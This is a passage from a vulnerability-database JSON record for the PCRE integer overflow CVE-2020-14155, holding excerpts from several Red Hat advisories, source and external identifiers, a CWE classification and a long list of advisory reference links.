\npcre-utf16-debuginfo-8.42-6.el8.s390x.rpm\npcre-utf32-8.42-6.el8.s390x.rpm\npcre-utf32-debuginfo-8.42-6.el8.s390x.rpm\n\nx86_64:\npcre-8.42-6.el8.i686.rpm\npcre-8.42-6.el8.x86_64.rpm\npcre-cpp-8.42-6.el8.i686.rpm\npcre-cpp-8.42-6.el8.x86_64.rpm\npcre-cpp-debuginfo-8.42-6.el8.i686.rpm\npcre-cpp-debuginfo-8.42-6.el8.x86_64.rpm\npcre-debuginfo-8.42-6.el8.i686.rpm\npcre-debuginfo-8.42-6.el8.x86_64.rpm\npcre-debugsource-8.42-6.el8.i686.rpm\npcre-debugsource-8.42-6.el8.x86_64.rpm\npcre-devel-8.42-6.el8.i686.rpm\npcre-devel-8.42-6.el8.x86_64.rpm\npcre-tools-debuginfo-8.42-6.el8.i686.rpm\npcre-tools-debuginfo-8.42-6.el8.x86_64.rpm\npcre-utf16-8.42-6.el8.i686.rpm\npcre-utf16-8.42-6.el8.x86_64.rpm\npcre-utf16-debuginfo-8.42-6.el8.i686.rpm\npcre-utf16-debuginfo-8.42-6.el8.x86_64.rpm\npcre-ut
f32-8.42-6.el8.i686.rpm\npcre-utf32-8.42-6.el8.x86_64.rpm\npcre-utf32-debuginfo-8.42-6.el8.i686.rpm\npcre-utf32-debuginfo-8.42-6.el8.x86_64.rpm\n\nRed Hat Enterprise Linux CRB (v. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. Summary:\n\nThe Migration Toolkit for Containers (MTC) 1.6.3 is now available. Description:\n\nThe Migration Toolkit for Containers (MTC) enables you to migrate\nKubernetes resources, persistent volume data, and internal container images\nbetween OpenShift Container Platform clusters, using the MTC web console or\nthe Kubernetes API. Bugs fixed (https://bugzilla.redhat.com/):\n\n2019088 - \"MigrationController\" CR displays syntax error when unquiescing applications\n2021666 - Route name longer than 63 characters causes direct volume migration to fail\n2021668 - \"MigrationController\" CR ignores the \"cluster_subdomain\" value for direct volume migration routes\n2022017 - CVE-2021-3948 mig-controller: incorrect namespaces handling may lead to not authorized usage of Migration Toolkit for Containers (MTC)\n2024966 - Manifests not used by Operator Lifecycle Manager must be removed from the MTC 1.6 Operator image\n2027196 - \"migration-controller\" pod goes into \"CrashLoopBackoff\" state if an invalid registry route is entered on the \"Clusters\" page of the web console\n2027382 - \"Copy oc describe/oc logs\" window does not close automatically after timeout\n2028841 - \"rsync-client\" container fails during direct volume migration with \"Address family not supported by protocol\" error\n2031793 - \"migration-controller\" pod goes into \"CrashLoopBackOff\" state if \"MigPlan\" CR contains an invalid \"includedResources\" resource\n2039852 - \"migration-controller\" pod goes into \"CrashLoopBackOff\" state if \"MigPlan\" CR contains an invalid \"destMigClusterRef\" or \"srcMigClusterRef\"\n\n5. 
Bugs fixed (https://bugzilla.redhat.com/):\n\n1983596 - CVE-2021-34558 golang: crypto/tls: certificate of wrong type is causing TLS client to panic\n1992006 - CVE-2021-29923 golang: net: incorrect parsing of extraneous zero characters at the beginning of an IP address octet\n1997017 - unprivileged client fails to get guest agent data\n1998855 - Node drain: Sometimes source virt-launcher pod status is Failed and not Completed\n2000251 - RoleBinding and ClusterRoleBinding brought in by kubevirt does not get reconciled when kind is ServiceAccount\n2001270 - [VMIO] [Warm from Vmware] Snapshot files are not deleted after Successful Import\n2001281 - [VMIO] [Warm from VMware] Source VM should not be turned ON if vmio import is removed\n2001901 - [4.8.3] NNCP creation failures after nmstate-handler pod deletion\n2007336 - 4.8.3 containers\n2007776 - Failed to Migrate Windows VM with CDROM (readonly)\n2008511 - [CNV-4.8.3] VMI is in LiveMigrate loop when Upgrading Cluster from 2.6.7/4.7.32 to OCP 4.8.13\n2012890 - With descheduler during multiple VMIs migrations, some VMs are restarted\n2025475 - [4.8.3] Upgrade from 2.6 to 4.x versions failed due to vlan-filtering issues\n2026881 - [4.8.3] vlan-filtering is getting applied on veth ports\n\n5. Description:\n\nThe release of RHACS 3.67 provides the following new features, bug fixes,\nsecurity patches and system changes:\n\nOpenShift Dedicated support\n\nRHACS 3.67 is thoroughly tested and supported on OpenShift Dedicated on\nAmazon Web Services and Google Cloud Platform. Use OpenShift OAuth server as an identity provider\nIf you are using RHACS with OpenShift, you can now configure the built-in\nOpenShift OAuth server as an identity provider for RHACS. Enhancements for CI outputs\nRed Hat has improved the usability of RHACS CI integrations. CI outputs now\nshow additional detailed information about the vulnerabilities and the\nsecurity policies responsible for broken builds. 
Runtime Class policy criteria\nUsers can now use RHACS to define the container runtime configuration that\nmay be used to run a pod\u2019s containers using the Runtime Class policy\ncriteria. \n\nBug Fixes\nThe release of RHACS 3.67 includes the following bug fixes:\n\n1. Previously, when using RHACS with the Compliance Operator integration,\nRHACS did not respect or populate Compliance Operator TailoredProfiles. \nThis has been fixed. Previously, the Alpine Linux package manager (APK) in Image policy\nlooked for the presence of apk package in the image rather than the\napk-tools package. This issue has been fixed. \n\nSystem changes\nThe release of RHACS 3.67 includes the following system changes:\n\n1. Scanner now identifies vulnerabilities in Ubuntu 21.10 images. The Port exposure method policy criteria now include route as an\nexposure method. The OpenShift: Kubeadmin Secret Accessed security policy now allows the\nOpenShift Compliance Operator to check for the existence of the Kubeadmin\nsecret without creating a violation. The OpenShift Compliance Operator integration now supports using\nTailoredProfiles. The RHACS Jenkins plugin now provides additional security information. When you enable the environment variable ROX_NETWORK_ACCESS_LOG for\nCentral, the logs contain the Request URI and X-Forwarded-For header\nvalues. The default uid:gid pair for the Scanner image is now 65534:65534. RHACS adds a new default Scope Manager role that includes minimum\npermissions to create and modify access scopes. In addition to manually uploading vulnerability definitions in offline\nmode, you can now upload definitions in online mode. You can now format the output of the following roxctl CLI commands in\ntable, csv, or JSON format: image scan, image check \u0026 deployment check\n12. You can now use a regular expression for the deployment name while\nspecifying policy exclusions\n\n3. 
Solution:\n\nTo take advantage of these new features, fixes and changes, please upgrade\nRed Hat Advanced Cluster Security for Kubernetes to version 3.67. Bugs fixed (https://bugzilla.redhat.com/):\n\n1956818 - CVE-2021-23343 nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe\n1978144 - CVE-2021-32690 helm: information disclosure vulnerability\n1992006 - CVE-2021-29923 golang: net: incorrect parsing of extraneous zero characters at the beginning of an IP address octet\n1999784 - CVE-2021-3749 nodejs-axios: Regular expression denial of service in trim function\n2005445 - CVE-2021-3801 nodejs-prismjs: ReDoS vulnerability\n2006044 - CVE-2021-39293 golang: archive/zip: malformed archive may cause panic or memory exhaustion (incomplete fix of CVE-2021-33196)\n2016640 - CVE-2020-27304 civetweb: directory traversal when using the built-in example HTTP form-based file upload mechanism via the mg_handle_form_request API\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nRHACS-65 - Release RHACS 3.67.0\n\n6. In addition to persistent storage, Red Hat\nOpenShift Container Storage provides a multicloud data management service\nwith an S3 compatible API. \n\nBug Fix(es):\n\n* Previously, when the namespace store target was deleted, no alert was\nsent to the namespace bucket because of an issue in calculating the\nnamespace bucket health. With this update, the issue in calculating the\nnamespace bucket health is fixed and alerts are triggered as expected. \n(BZ#1993873)\n\n* Previously, the Multicloud Object Gateway (MCG) components performed\nslowly and there was a lot of pressure on the MCG components due to\nnon-optimized database queries. With this update the non-optimized\ndatabase queries are fixed which reduces the compute resources and time\ntaken for queries. 
Bugs fixed (https://bugzilla.redhat.com/):\n\n1993873 - [4.8.z clone] Alert NooBaaNamespaceBucketErrorState is not triggered when namespacestore\u0027s target bucket is deleted\n2006958 - CVE-2020-26301 nodejs-ssh2: Command injection by calling vulnerable method with untrusted input\n\n5. Description:\n\nThis release adds the new Apache HTTP Server 2.4.37 Service Pack 10\npackages that are part of the JBoss Core Services offering. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-14155"
},
{
"db": "VULHUB",
"id": "VHN-167005"
},
{
"db": "PACKETSTORM",
"id": "168042"
},
{
"db": "PACKETSTORM",
"id": "164825"
},
{
"db": "PACKETSTORM",
"id": "165631"
},
{
"db": "PACKETSTORM",
"id": "165135"
},
{
"db": "PACKETSTORM",
"id": "165129"
},
{
"db": "PACKETSTORM",
"id": "165096"
},
{
"db": "PACKETSTORM",
"id": "164927"
},
{
"db": "PACKETSTORM",
"id": "165862"
}
],
"trust": 1.71
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-167005",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-167005"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-14155",
"trust": 2.5
},
{
"db": "PACKETSTORM",
"id": "165135",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "165096",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "165862",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "165631",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "164927",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "165129",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "164825",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "161245",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "168352",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "165099",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "166051",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "167956",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "166308",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "165286",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "160545",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "168392",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "166489",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "164967",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "165002",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "165758",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "167206",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "168036",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "165209",
"trust": 0.7
},
{
"db": "CNNVD",
"id": "CNNVD-202006-1036",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2021.3905",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4019",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.4082",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.4060",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3935",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.3977",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1071",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.3732",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3781",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.0394",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4172",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4059",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.3821",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1677",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2265",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3864",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.0716",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4254",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4229",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.4601",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1837",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.0245",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.0349",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.0493",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.4568",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2722",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.4060.2",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4095",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.2430",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3586",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "166789",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022051846",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021111102",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022042257",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022051733",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "48066",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2020-53121",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165296",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "164928",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165287",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165288",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166309",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-167005",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "168042",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-167005"
},
{
"db": "PACKETSTORM",
"id": "168042"
},
{
"db": "PACKETSTORM",
"id": "164825"
},
{
"db": "PACKETSTORM",
"id": "165631"
},
{
"db": "PACKETSTORM",
"id": "165135"
},
{
"db": "PACKETSTORM",
"id": "165129"
},
{
"db": "PACKETSTORM",
"id": "165096"
},
{
"db": "PACKETSTORM",
"id": "164927"
},
{
"db": "PACKETSTORM",
"id": "165862"
},
{
"db": "CNNVD",
"id": "CNNVD-202006-1036"
},
{
"db": "NVD",
"id": "CVE-2020-14155"
}
]
},
"id": "VAR-202006-0222",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-167005"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T21:42:24.486000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "PCRE Enter the fix for the verification error vulnerability",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=122998"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202006-1036"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-190",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-167005"
},
{
"db": "NVD",
"id": "CVE-2020-14155"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.3,
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"trust": 1.7,
"url": "https://security.netapp.com/advisory/ntap-20221028-0010/"
},
{
"trust": 1.7,
"url": "https://about.gitlab.com/releases/2020/07/01/security-release-13-1-2-release/"
},
{
"trust": 1.7,
"url": "https://support.apple.com/kb/ht211931"
},
{
"trust": 1.7,
"url": "https://support.apple.com/kb/ht212147"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2020/dec/32"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2021/feb/14"
},
{
"trust": 1.7,
"url": "https://bugs.gentoo.org/717920"
},
{
"trust": 1.7,
"url": "https://www.pcre.org/original/changelog.txt"
},
{
"trust": 1.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14155"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3cdev.mina.apache.org%3e"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2019-20838"
},
{
"trust": 0.8,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.8,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2020-14155"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20838"
},
{
"trust": 0.7,
"url": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3cdev.mina.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-36084"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-36085"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2019-5827"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17595"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-5827"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-3580"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2020-24370"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19603"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13750"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2019-17594"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13751"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2019-19603"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2019-13750"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-36087"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-20231"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2019-13751"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-20232"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17594"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2019-17595"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-18218"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-36086"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2019-18218"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2020-13435"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.0245"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3905"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.0349/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/165862/red-hat-security-advisory-2022-0434-05.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/165631/red-hat-security-advisory-2022-0202-04.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.0716"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-wmlce-libpcre-in-pcre-before-8-44-allows-an-integer-overflow/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.2430"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/pcre-integer-overflow-via-large-number-after-substring-36752"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/168352/red-hat-security-advisory-2022-6429-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166489/red-hat-security-advisory-2022-1081-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164825/red-hat-security-advisory-2021-4373-04.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.0394"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.4082"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/165286/red-hat-security-advisory-2021-5128-06.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022042257"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4059"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/160545/apple-security-advisory-2020-12-14-4.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166789/red-hat-security-advisory-2022-1396-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4254"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4095"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4172"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1837"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-pcre-affects-ibm-sql-extensions-toolkit-for-nps/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167206/ubuntu-security-notice-usn-5425-1.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1677"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.3977"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164927/red-hat-security-advisory-2021-4614-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167956/red-hat-security-advisory-2022-5840-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.4060/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1071"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4019"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2265/"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/apple-macos-11-multiple-vulnerabilities-33899"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2722/"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/48066"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/165135/red-hat-security-advisory-2021-4914-06.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.4060.2/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/165129/red-hat-security-advisory-2021-4902-06.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/165209/red-hat-security-advisory-2021-5038-04.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.3821"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022051846"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021111102"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/165096/red-hat-security-advisory-2021-4845-05.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.0493"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3935"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.3732"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/161245/apple-security-advisory-2021-02-01-1.html"
},
{
"trust": 0.6,
"url": "https://support.apple.com/en-us/ht212147"
},
{
"trust": 0.6,
"url": "https://support.apple.com/en-us/ht211931"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4229"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/168392/red-hat-security-advisory-2022-6526-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/165002/red-hat-security-advisory-2021-4032-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/165099/red-hat-security-advisory-2021-4848-07.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166051/red-hat-security-advisory-2022-0580-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3781"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3864"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/168036/red-hat-security-advisory-2022-5070-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/165758/red-hat-security-advisory-2022-0318-06.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3586"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166308/red-hat-security-advisory-2022-0842-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164967/red-hat-security-advisory-2021-4627-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022051733"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.4568"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.4601"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-16135"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2021-3200"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2021-27645"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2021-33574"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2021-35942"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-12762"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2021-22898"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12762"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-16135"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2021-3800"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2021-3445"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13435"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2021-22925"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2021-20266"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2021-22876"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2021-33560"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2021-28153"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-42574"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22876"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-23841"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20231"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24370"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22925"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-23840"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22898"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20266"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20232"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3572"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3778"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3712"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3426"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3796"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-29923"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23841"
},
{
"trust": 0.3,
